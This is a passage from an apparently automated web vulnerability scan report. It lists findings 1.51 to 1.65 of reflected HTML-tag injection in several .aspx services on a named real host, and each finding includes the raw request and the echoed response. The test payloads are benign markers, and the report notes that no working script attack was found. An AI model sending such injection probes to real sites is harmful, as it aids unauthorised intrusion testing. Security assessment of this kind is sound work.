<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790617ba<a>cdb0e19b088/AdServerService.asmx" />
...[SNIP]...

1.51. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ChannelInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7b0e2<a>32a22f94924 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&7b0e2<a>32a22f94924=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:08:13 GMT
Connection: close
Content-Length: 20181

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&7b0e2<a>32a22f94924=1/ChannelInfoService.asmx" />
...[SNIP]...

1.52. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ChannelInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ChannelInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload d6e5c<a>d9a3f24979b was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790d6e5c<a>d9a3f24979b HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:08:11 GMT
Connection: close
Content-Length: 20169

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790d6e5c<a>d9a3f24979b/ChannelInfoService.asmx" />
...[SNIP]...

1.53. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ClipInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ClipInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c4c49<a>7cb1e40de21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&c4c49<a>7cb1e40de21=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:26 GMT
Content-Length: 22408
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&c4c49<a>7cb1e40de21=1/ClipInfoService.asmx" />
...[SNIP]...

1.54. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ClipInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ClipInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload e18ca<a>6906893379b was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790e18ca<a>6906893379b HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:24 GMT
Content-Length: 22396
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790e18ca<a>6906893379b/ClipInfoService.asmx" />
...[SNIP]...

1.55. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ErrorInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ErrorInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cf283<a>e8b5e6bb6c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&cf283<a>e8b5e6bb6c4=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:31 GMT
Content-Length: 5637
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&cf283<a>e8b5e6bb6c4=1/ErrorInfoService.asmx" />
...[SNIP]...

1.56. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ErrorInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ErrorInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 150c4<a>00e4e98fd41 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790150c4<a>00e4e98fd41 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:30 GMT
Content-Length: 5625
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790150c4<a>00e4e98fd41/ErrorInfoService.asmx" />
...[SNIP]...

1.57. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/PlaylistInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 375a5<a>7fe89851c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&375a5<a>7fe89851c3=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:08:03 GMT
Connection: close
Content-Length: 27394

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&375a5<a>7fe89851c3=1/PlaylistInfoService.asmx" />
...[SNIP]...

1.58. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/PlaylistInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/PlaylistInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload f7f5e<a>3ccf05f49f was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790f7f5e<a>3ccf05f49f HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:08:02 GMT
Connection: close
Content-Length: 27382

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790f7f5e<a>3ccf05f49f/PlaylistInfoService.asmx" />
...[SNIP]...

1.59. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RSSService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RSSService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3ac06<a>42b3e8952f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&3ac06<a>42b3e8952f7=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:30 GMT
Content-Length: 8814
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&3ac06<a>42b3e8952f7=1/RSSService.asmx" />
...[SNIP]...

1.60. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RSSService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RSSService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 24326<a>3030b9b9796 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379024326<a>3030b9b9796 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:27 GMT
Content-Length: 8802
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379024326<a>3030b9b9796/RSSService.asmx" />
...[SNIP]...

1.61. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RatingService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RatingService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 495d2<a>538293d5b25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&495d2<a>538293d5b25=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:27 GMT
Content-Length: 5534
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&495d2<a>538293d5b25=1/RatingService.asmx" />
...[SNIP]...

1.62. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RatingService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RatingService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload f1f12<a>20b02dc54b6 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790f1f12<a>20b02dc54b6 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:25 GMT
Content-Length: 5522
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790f1f12<a>20b02dc54b6/RatingService.asmx" />
...[SNIP]...

1.63. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/AdServerService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/AdServerService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 700ca<a>738587d8c77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&700ca<a>738587d8c77=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:44 GMT
Content-Length: 1913
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&700ca<a>738587d8c77=1/AdServerService.asmx" />
...[SNIP]...

1.64. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/AdServerService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/AdServerService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload f53b7<a>ee9f52a0ab8 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793f53b7<a>ee9f52a0ab8 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:43 GMT
Content-Length: 1907
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793f53b7<a>ee9f52a0ab8/AdServerService.asmx" />
...[SNIP]...

1.65. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ChannelInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a014e<a>6ade69e1294 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&a014e<a>6ade69e1294=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:23:22 GMT
Connection: close
Content-Length: 20181

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
